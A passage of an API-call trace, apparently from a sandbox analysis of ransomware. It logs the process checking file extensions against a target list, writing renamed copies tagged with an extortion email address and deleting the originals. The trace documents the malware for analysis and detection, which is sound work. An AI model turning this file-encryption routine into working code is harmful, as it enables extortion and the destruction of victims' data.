Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0056.958] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0056.958] lstrlenW (lpString=".doc") returned 4 [0056.958] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0056.958] lstrlenW (lpString=".docx") returned 5 [0056.958] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0056.958] lstrlenW (lpString=".pdf") returned 4 [0056.958] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0056.958] lstrlenW (lpString=".xls") returned 4 [0056.958] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0056.958] lstrlenW (lpString=".xlsx") returned 5 [0056.958] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0056.958] lstrlenW (lpString=".ppt") returned 4 [0056.958] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0056.958] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0056.958] lstrlenW (lpString=".zip") returned 4 [0056.958] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0056.958] lstrlenW (lpString=".rar") returned 4 [0056.958] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0056.958] lstrlenW (lpString=".bz2") returned 4 [0056.958] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0056.958] lstrlenW (lpString=".7z") returned 3 [0056.959] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0056.959] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0056.959] lstrlenW (lpString=".dbf") returned 4 [0056.959] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0056.959] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0056.959] lstrlenW (lpString=".1cd") returned 4 [0056.959] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0056.959] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 77 [0056.959] lstrlenW (lpString=".jpg") returned 4 [0056.959] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0056.959] lstrcmpiW (lpString1=".gif", lpString2=".bat") returned 1 [0056.959] lstrlenW (lpString="win32_CopyNoDrop32x32.gif") returned 25 [0056.959] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copynodrop32x32.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0056.959] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=153) returned 1 [0056.959] CloseHandle (hObject=0x344) returned 1 [0056.959] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copynodrop32x32.gif")) returned 0x20 [0056.959] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copynodrop32x32.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0056.959] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copynodrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0056.960] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.960] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.960] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copynodrop32x32.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0056.960] GetLastError () returned 0x0 [0056.960] ReadFile (in: hFile=0x344, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x99, lpOverlapped=0x0) returned 1 [0056.961] WriteFile (in: hFile=0x350, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xa0, lpOverlapped=0x0) returned 1 [0056.962] ReadFile (in: hFile=0x344, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0056.962] WriteFile (in: hFile=0x350, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x106, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x106, lpOverlapped=0x0) returned 1 [0056.962] SetEndOfFile (hFile=0x350) returned 1 [0056.962] CloseHandle (hObject=0x350) returned 1 [0056.963] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.963] SetEndOfFile (hFile=0x344) returned 1 [0056.963] CloseHandle (hObject=0x344) returned 1 [0056.963] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0056.964] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copynodrop32x32.gif")) returned 1 [0056.964] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0056.964] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0056.964] lstrlenW (lpString=".doc") returned 4 [0056.964] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0056.964] lstrlenW (lpString=".docx") returned 5 [0056.964] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0056.964] lstrlenW (lpString=".pdf") returned 4 [0056.964] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0056.964] lstrlenW (lpString=".xls") returned 4 [0056.964] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0056.964] lstrlenW (lpString=".xlsx") returned 5 [0056.964] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0056.964] lstrlenW (lpString=".ppt") returned 4 [0056.964] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0056.964] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0056.964] lstrlenW (lpString=".zip") returned 4 [0056.964] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0056.965] lstrlenW (lpString=".rar") returned 4 [0056.965] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0056.965] lstrlenW (lpString=".bz2") returned 4 [0056.965] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0056.965] lstrlenW (lpString=".7z") returned 3 [0056.965] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0056.965] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0056.965] lstrlenW (lpString=".dbf") returned 4 [0056.965] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0056.965] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0056.965] lstrlenW (lpString=".1cd") returned 4 [0056.965] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0056.965] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0056.965] lstrlenW (lpString=".jpg") returned 4 [0056.965] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0056.965] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0056.965] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0056.965] lstrlenW (lpString=".doc") returned 4 [0056.965] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0056.965] lstrlenW (lpString=".docx") returned 5 [0056.965] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0056.965] lstrlenW (lpString=".pdf") returned 4 [0056.965] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0056.965] lstrlenW (lpString=".xls") returned 4 [0056.965] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0056.965] lstrlenW (lpString=".xlsx") returned 5 [0056.965] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0056.965] lstrlenW (lpString=".ppt") returned 4 [0056.965] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0056.965] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0056.965] lstrlenW (lpString=".zip") returned 4 [0056.965] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0056.966] lstrlenW (lpString=".rar") returned 4 [0056.966] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0056.966] lstrlenW (lpString=".bz2") returned 4 [0056.966] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0056.966] lstrlenW (lpString=".7z") returned 3 [0056.966] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0056.966] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0056.966] lstrlenW (lpString=".dbf") returned 4 [0056.966] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0056.966] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0056.966] lstrlenW (lpString=".1cd") returned 4 [0056.966] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0056.966] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0056.966] lstrlenW (lpString=".jpg") returned 4 [0056.966] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0056.966] lstrcmpiW (lpString1=".gif", lpString2=".bat") returned 1 [0056.966] lstrlenW (lpString="win32_LinkDrop32x32.gif") returned 23 [0056.966] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linkdrop32x32.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0056.966] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=168) returned 1 [0056.966] CloseHandle (hObject=0x344) returned 1 [0056.966] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linkdrop32x32.gif")) returned 0x20 [0056.967] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linkdrop32x32.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0056.967] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linkdrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0056.967] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.967] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.967] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linkdrop32x32.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0056.967] GetLastError () returned 0x0 [0056.967] ReadFile (in: hFile=0x344, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0xa8, lpOverlapped=0x0) returned 1 [0057.705] WriteFile (in: hFile=0x350, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xb0, lpOverlapped=0x0) returned 1 [0057.706] ReadFile (in: hFile=0x344, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0057.707] WriteFile (in: hFile=0x350, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x102, lpOverlapped=0x0) returned 1 [0057.707] SetEndOfFile (hFile=0x350) returned 1 [0057.707] CloseHandle (hObject=0x350) returned 1 [0057.708] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0057.708] SetEndOfFile (hFile=0x344) returned 1 [0057.708] CloseHandle (hObject=0x344) returned 1 [0057.709] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0057.709] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linkdrop32x32.gif")) returned 1 [0057.709] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0057.709] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0057.709] lstrlenW (lpString=".doc") returned 4 [0057.709] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0057.709] lstrlenW (lpString=".docx") returned 5 [0057.709] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0057.709] lstrlenW (lpString=".pdf") returned 4 [0057.709] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0057.710] lstrlenW (lpString=".xls") returned 4 [0057.710] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0057.710] lstrlenW (lpString=".xlsx") returned 5 [0057.710] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0057.710] lstrlenW (lpString=".ppt") returned 4 [0057.710] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0057.710] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0057.710] lstrlenW (lpString=".zip") returned 4 [0057.710] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0057.710] lstrlenW (lpString=".rar") returned 4 [0057.710] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0057.710] lstrlenW (lpString=".bz2") returned 4 [0057.710] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0057.710] lstrlenW (lpString=".7z") returned 3 [0057.710] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0057.710] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0057.710] lstrlenW (lpString=".dbf") returned 4 [0057.710] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0057.710] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0057.710] lstrlenW (lpString=".1cd") returned 4 [0057.710] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0057.710] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0057.710] lstrlenW (lpString=".jpg") returned 4 [0057.710] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0057.710] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0057.710] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0057.710] lstrlenW (lpString=".doc") returned 4 [0057.711] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0057.711] lstrlenW (lpString=".docx") returned 5 [0057.711] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0057.711] lstrlenW (lpString=".pdf") returned 4 [0057.711] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0057.711] lstrlenW (lpString=".xls") returned 4 [0057.711] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0057.711] lstrlenW (lpString=".xlsx") returned 5 [0057.711] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0057.711] lstrlenW (lpString=".ppt") returned 4 [0057.711] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0057.711] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0057.711] lstrlenW (lpString=".zip") returned 4 [0057.711] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0057.711] lstrlenW (lpString=".rar") returned 4 [0057.711] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0057.711] lstrlenW (lpString=".bz2") returned 4 [0057.711] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0057.711] lstrlenW (lpString=".7z") returned 3 [0057.711] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0057.711] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0057.711] lstrlenW (lpString=".dbf") returned 4 [0057.711] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0057.711] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0057.711] lstrlenW (lpString=".1cd") returned 4 [0057.711] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0057.711] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 77 [0057.711] lstrlenW (lpString=".jpg") returned 4 [0057.711] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0057.712] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0057.712] lstrlenW (lpString="FileSystemMetadata.xml") returned 22 [0057.712] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml" (normalized: "c:\\program files\\microsoft office\\filesystemmetadata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0057.712] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=281) returned 1 [0057.712] CloseHandle (hObject=0x344) returned 1 [0057.712] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml" (normalized: "c:\\program files\\microsoft office\\filesystemmetadata.xml")) returned 0x220 [0057.712] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\filesystemmetadata.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0057.712] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml" (normalized: "c:\\program files\\microsoft office\\filesystemmetadata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0057.712] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0057.713] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0057.713] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\filesystemmetadata.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0057.713] GetLastError () returned 0x0 [0057.713] ReadFile (in: hFile=0x344, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x119, lpOverlapped=0x0) returned 1 [0057.714] WriteFile (in: hFile=0x350, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x120, lpOverlapped=0x0) returned 1 [0057.715] ReadFile (in: hFile=0x344, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0057.715] WriteFile (in: hFile=0x350, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x100, lpOverlapped=0x0) returned 1 [0057.954] SetEndOfFile (hFile=0x350) returned 1 [0057.954] CloseHandle (hObject=0x350) returned 1 [0057.954] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0057.954] SetEndOfFile (hFile=0x344) returned 1 [0057.955] CloseHandle (hObject=0x344) returned 1 [0057.955] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0057.955] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml" (normalized: "c:\\program files\\microsoft office\\filesystemmetadata.xml")) returned 1 [0057.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0057.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0057.956] lstrlenW (lpString=".doc") returned 4 [0057.956] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0057.956] lstrlenW (lpString=".docx") returned 5 [0057.956] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0057.956] lstrlenW (lpString=".pdf") returned 4 [0057.956] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0057.956] lstrlenW (lpString=".xls") returned 4 [0057.956] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0057.956] lstrlenW (lpString=".xlsx") returned 5 [0057.956] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0057.956] lstrlenW (lpString=".ppt") returned 4 [0057.956] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0057.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0057.956] lstrlenW (lpString=".zip") returned 4 [0057.956] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0057.956] lstrlenW (lpString=".rar") returned 4 [0057.956] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0057.956] lstrlenW (lpString=".bz2") returned 4 [0057.956] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0057.956] lstrlenW (lpString=".7z") returned 3 [0057.956] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0057.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0057.956] lstrlenW (lpString=".dbf") returned 4 [0057.957] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0057.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0057.957] lstrlenW (lpString=".1cd") returned 4 [0057.957] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0057.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0057.957] lstrlenW (lpString=".jpg") returned 4 [0057.957] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0057.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0057.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml") returned 56 [0057.957] lstrlenW (lpString=".doc") returned 4 [0057.957] lstrcmpiW (lpString1=".doc", 